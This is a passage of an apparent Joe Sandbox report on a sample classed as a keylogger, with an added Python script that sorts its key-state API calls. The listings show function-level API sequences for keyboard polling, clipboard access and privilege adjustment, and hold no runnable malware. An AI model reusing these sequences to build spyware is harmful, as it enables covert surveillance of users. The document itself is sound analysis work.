                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3616455698-4108050209
                                                                                                                  • Opcode ID: 8848f25d6bebc1bb6110560aaa296adf24f40e351b510fe848d68cb5a8357ae6
                                                                                                                  • Instruction ID: 8395cd504d85744bf8d988ab10d054ec52f9eaee8a4b01c03d84776c9787d7cc
                                                                                                                  • Opcode Fuzzy Hash: 8848f25d6bebc1bb6110560aaa296adf24f40e351b510fe848d68cb5a8357ae6
                                                                                                                  • Instruction Fuzzy Hash: FD81AC70609311EFD710CF15E884A6BBBE8FB88718F04592EF995A7392D770D805CB62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E1ABD7
                                                                                                                    • Part of subcall function 00E1ABBB: GetLastError.KERNEL32(?,00E1A69F,?,?,?), ref: 00E1ABE1
                                                                                                                    • Part of subcall function 00E1ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00E1A69F,?,?,?), ref: 00E1ABF0
                                                                                                                    • Part of subcall function 00E1ABBB: RtlAllocateHeap.NTDLL(00000000,?,00E1A69F), ref: 00E1ABF7
                                                                                                                    • Part of subcall function 00E1ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E1AC0E
                                                                                                                    • Part of subcall function 00E1AC56: GetProcessHeap.KERNEL32(00000008,00E1A6B5,00000000,00000000,?,00E1A6B5,?), ref: 00E1AC62
                                                                                                                    • Part of subcall function 00E1AC56: RtlAllocateHeap.NTDLL(00000000,?,00E1A6B5), ref: 00E1AC69
                                                                                                                    • Part of subcall function 00E1AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E1A6B5,?), ref: 00E1AC7A
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1A6D0
                                                                                                                  • _memset.LIBCMT ref: 00E1A6E5
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1A704
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A715
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E1A752
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E1A76E
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00E1A78B
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E1A79A
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E1A7A1
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1A7C2
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00E1A7C9
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E1A7FA
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E1A820
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E1A834
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: 1961bcade300e397134969c578290e6ba478363297337efe378a4ae32a2ac684
                                                                                                                  • Instruction ID: d8e716a47abf17a6079ab842f0475c00399768a9c3ca5d5e1a54555c80cebae0
                                                                                                                  • Opcode Fuzzy Hash: 1961bcade300e397134969c578290e6ba478363297337efe378a4ae32a2ac684
                                                                                                                  • Instruction Fuzzy Hash: 3E515C71A01209AFDF049F91DC48EFEBBB9FF04314F08812AE811B6291D7749A46CB61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$
                                                                                                                  • API String ID: 0-699356676
                                                                                                                  • Opcode ID: 7c4b18e1d358aa71e6dd7373808592546e49fdd9880c3f57992e932e60a11f13
                                                                                                                  • Instruction ID: eb580764977cb27007200badfe557e2b6e26d0ddb00677ccc4f4d55ddc0e0898
                                                                                                                  • Opcode Fuzzy Hash: 7c4b18e1d358aa71e6dd7373808592546e49fdd9880c3f57992e932e60a11f13
                                                                                                                  • Instruction Fuzzy Hash: BF72A171E042598BDF24DF99D8807AEB7B5FF48350F14916AE919FB280DB309E41DBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • _wcscat.LIBCMT ref: 00E26441
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2645F
                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E26474
                                                                                                                  • _wcscpy.LIBCMT ref: 00E264A3
                                                                                                                  • _wcscat.LIBCMT ref: 00E264B8
                                                                                                                  • _wcscat.LIBCMT ref: 00E264CA
                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00E264DA
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E264EB
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E26506
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2643075503-1173974218
                                                                                                                  • Opcode ID: 48c31f6a0a299ffae900a9dccae4b51e3fa93c502e9da96a6b8adbe05fdae995
                                                                                                                  • Instruction ID: e5172a6e0268b5f30fedecdd08701ae9f1a6b9fa4c775248889317716f3d7224
                                                                                                                  • Opcode Fuzzy Hash: 48c31f6a0a299ffae900a9dccae4b51e3fa93c502e9da96a6b8adbe05fdae995
                                                                                                                  • Instruction Fuzzy Hash: EE31A2B240C3889EC721EBA49C85ADBB7DCAF55304F401A1EF5D8D3141EA35D54D8767
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4328E
                                                                                                                    • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                    • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E4332D
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E433C5
                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E43604
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E43611
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1240663315-0
                                                                                                                  • Opcode ID: 0e5e516298acbcab8f9bccf932ccbe623b3d07131b7656ed5498ad50998910e5
                                                                                                                  • Instruction ID: cd8c6c8721a3e31f8d6d7ff4d073466f5947bcdaa8815aad0018d2bb3fc92ec5
                                                                                                                  • Opcode Fuzzy Hash: 0e5e516298acbcab8f9bccf932ccbe623b3d07131b7656ed5498ad50998910e5
                                                                                                                  • Instruction Fuzzy Hash: BAE16C35604210AFCB14EF29D995E6EBBE9EF88314F04846DF54AE72A1DB30ED05CB61
APIs
• GetKeyboardState.USER32(?), ref: 00E22B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00E22BE0
• GetKeyState.USER32(000000A0), ref: 00E22BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00E22C15
• GetKeyState.USER32(000000A1), ref: 00E22C2A
• GetAsyncKeyState.USER32(00000011), ref: 00E22C42
• GetKeyState.USER32(00000011), ref: 00E22C54
• GetAsyncKeyState.USER32(00000012), ref: 00E22C6C
• GetKeyState.USER32(00000012), ref: 00E22C7E
• GetAsyncKeyState.USER32(0000005B), ref: 00E22C96
• GetKeyState.USER32(0000005B), ref: 00E22CA8
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 2de24191be84fc9996a0a4e45b6d042d599e5afa8468aa8a78f7af627d17ccc7
• Instruction ID: db74b7238437dc038faa9504458325d556c05ad06f3aa01556a8fca9672db1a8
• Opcode Fuzzy Hash: 2de24191be84fc9996a0a4e45b6d042d599e5afa8468aa8a78f7af627d17ccc7
• Instruction Fuzzy Hash: 8741D330A047D97DFF309B60A8053AAFEA06B11358F44A05DDBC6766C1DAA599C8C7A2
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 4120139f42fadbca888930751fbbece8986c6ae7c52199e2a75c59c9a10ae5d2
• Instruction ID: 82b55d002e6610c6c9d8bdeba0066cc1c1faaa31f2b68ed8a4104922165ebced
• Opcode Fuzzy Hash: 4120139f42fadbca888930751fbbece8986c6ae7c52199e2a75c59c9a10ae5d2
• Instruction Fuzzy Hash: 5E219F31704110AFDB11AF66EC59B6E7BE8EF48750F45C019F90AEB2A1CB70E904CBA0
APIs
  • Part of subcall function 00E19ABF: CLSIDFromProgID.COMBASE ref: 00E19ADC
  • Part of subcall function 00E19ABF: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00E19AF7
  • Part of subcall function 00E19ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00E19B05
  • Part of subcall function 00E19ABF: CoTaskMemFree.COMBASE(00000000), ref: 00E19B15
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00E3C235
• _memset.LIBCMT ref: 00E3C242
• _memset.LIBCMT ref: 00E3C360
• CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00E3C38C
• CoTaskMemFree.COMBASE(?), ref: 00E3C397
Strings
• NULL Pointer assignment, xrefs: 00E3C3E5
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
• Opcode ID: 418ffb03f1831fed0ec113fade94b876ae6cafac9c05d8a1124d863750e5d805
• Instruction ID: 3a0e3f0ff6f882f93f5fdc6f3f4c9ea40204a2658b7ec5982c2586c41c56cfe9
• Opcode Fuzzy Hash: 418ffb03f1831fed0ec113fade94b876ae6cafac9c05d8a1124d863750e5d805
• Instruction Fuzzy Hash: 6F915C71D00218ABDB10EF95DC85EEEBBB8EF08750F20915AF519B7281DB709A45CFA0
APIs
  • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
• GetSystemMetrics.USER32(0000000F), ref: 00E5016D
• MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00E5038D
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E503AB
• InvalidateRect.USER32(?,00000000,00000001,?), ref: 00E503D6
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E503FF
• ShowWindow.USER32(00000003,00000000), ref: 00E50421
• NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00E50440
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
• String ID:
• API String ID: 2922825909-0
• Opcode ID: 9059138297d633064f55b89c646ede8f0743410642fd253890c80a5590da8419
• Instruction ID: 22a8c59635850e17522f7cf5e9c422884d2dcf620328f385ad1bbfc2e4924097
• Opcode Fuzzy Hash: 9059138297d633064f55b89c646ede8f0743410642fd253890c80a5590da8419
• Instruction Fuzzy Hash: 91A1DC34600616EFDB18CF28C9897BEBBB1BF08746F089525FC54AB290D774AD58CB90
APIs
  • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
  • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
  • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
• ReleaseCapture.USER32 ref: 00E4ED48
• SetWindowTextW.USER32(?,00000000), ref: 00E4EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E4EE03
• NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00E4EEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 973565025-2107944366
• Opcode ID: 5b24a12a3c7602d97062996eb8fc623be83db36b3057fdec7cce32b3ec202f29
• Instruction ID: 52661f2930f7c3a13d11e5aa4822c7584327443f00e1dcec876ee6b266058b7f
• Opcode Fuzzy Hash: 5b24a12a3c7602d97062996eb8fc623be83db36b3057fdec7cce32b3ec202f29
• Instruction Fuzzy Hash: 8B51AB70604304AFD710EF21EC96FAA77E4FF88714F04591DF995A62E1DB70A908CB62
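Two of the function summaries above call the same Win32 key-state APIs for different reasons: the GetKeyboardState routine queries GetAsyncKeyState and GetKeyState for 0xA0, 0xA1, 0x11, 0x12 and 0x5B, while the @GUI_DRAGFILE handler queries GetAsyncKeyState only for 0x01 and 0x02. The script below is an added example, not Joe Sandbox output and not code from the sample: it parses "APIs" entries in the report's line format, decodes the virtual-key constants to their winuser.h names and separates modifier-key polling from a plain mouse-button check. The two embedded listings are copied from those two summaries; the regular expression, the verdict labels and the "three or more modifiers after a GetKeyboardState snapshot" threshold are this example's own choices.

```python
"""Parse Joe Sandbox 'APIs' listings and classify their key-state queries.

Added example for this report; not Joe Sandbox code and not code from the sample.
"""
import re

# Win32 virtual-key codes (winuser.h) for the constants seen in the listings.
VK_NAMES = {
    0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT",
}
MODIFIER_VKS = {0x11, 0x12, 0x5B, 0xA0, 0xA1}

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; lines that
# belong to a callee carry a "Part of subcall function XXXXXXXX:" prefix.
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Copied from the GetKeyboardState function summary above.
KEYBOARD_LISTING = """\
• GetKeyboardState.USER32(?), ref: 00E22B5F
• GetAsyncKeyState.USER32(000000A0), ref: 00E22BE0
• GetKeyState.USER32(000000A0), ref: 00E22BFB
• GetAsyncKeyState.USER32(000000A1), ref: 00E22C15
• GetKeyState.USER32(000000A1), ref: 00E22C2A
• GetAsyncKeyState.USER32(00000011), ref: 00E22C42
• GetKeyState.USER32(00000011), ref: 00E22C54
• GetAsyncKeyState.USER32(00000012), ref: 00E22C6C
• GetKeyState.USER32(00000012), ref: 00E22C7E
• GetAsyncKeyState.USER32(0000005B), ref: 00E22C96
• GetKeyState.USER32(0000005B), ref: 00E22CA8
"""

# Copied from the @GUI_DRAGFILE function summary above.
DRAGDROP_LISTING = """\
  • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
  • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
  • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
  • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
• ReleaseCapture.USER32 ref: 00E4ED48
• SetWindowTextW.USER32(?,00000000), ref: 00E4EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E4EE03
• NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00E4EEDC
"""


def parse_api_lines(text):
    """Return one record per API line; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [] if raw is None else [a.strip() for a in raw.split(",")],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,
        })
    return calls


def arg_to_int(arg):
    """Hex argument -> int; '?' (not resolved by the plugin) -> None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def polled_keys(calls):
    """Map each virtual-key code queried to the set of APIs that queried it."""
    keys = {}
    for c in calls:
        if c["name"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            vk = arg_to_int(c["args"][0])
            if vk is not None:
                keys.setdefault(vk, set()).add(c["name"])
    return keys


def classify(calls):
    """Heuristic label for what the key-state calls of one function are doing."""
    keys = polled_keys(calls)
    modifiers = [vk for vk in keys if vk in MODIFIER_VKS]
    snapshot = any(c["name"] == "GetKeyboardState" for c in calls)
    if snapshot and len(modifiers) >= 3:
        verdict = "keyboard-state polling over modifier keys"
    elif keys and set(keys) <= {0x01, 0x02}:
        verdict = "mouse-button state check"
    elif keys:
        verdict = "key-state query"
    else:
        verdict = "no key-state calls"
    return {"verdict": verdict, "snapshot": snapshot,
            "keys": [VK_NAMES.get(vk, hex(vk)) for vk in sorted(keys)]}


if __name__ == "__main__":
    for label, text in (("keyboard", KEYBOARD_LISTING), ("dragdrop", DRAGDROP_LISTING)):
        print(label, classify(parse_api_lines(text)))
```

Run stand-alone, it labels the first listing as modifier-key polling (Shift, Ctrl, Alt and Win each read through both GetAsyncKeyState and GetKeyState after a GetKeyboardState snapshot) and the second as a left/right mouse-button check inside a drag-and-drop handler. One caveat when reading such a match in this report: the overview identifies the sample as a compiled AutoIt script, and the @GUI_DRAGFILE/@GUI_DROPID strings are AutoIt macros, so the dumped code is the AutoIt runtime. Modifier tracking of this shape is consistent with the runtime's own keyboard handling (used by its Send and HotKeySet functions), so the pattern locates interpreter code rather than proving that the embedded script logs keystrokes; the Snake Keylogger and VIP Keylogger classification above rests on the Yara and behavioural detections, not on this API sequence.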
APIs
  • Part of subcall function 00E1B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E1B180
  • Part of subcall function 00E1B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E1B1AD
  • Part of subcall function 00E1B134: GetLastError.KERNEL32 ref: 00E1B1BA
• ExitWindowsEx.USER32(?,00000000), ref: 00E27A0F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
• Opcode ID: 46d483c2f8b7716fc363b943757c68e4d18274d072ec1be0ce0253f3912ddcdb
• Instruction ID: 5085287e82e26359ec8f8c1f217f2087c208c4288e19c8b33cff72b1157d5f44
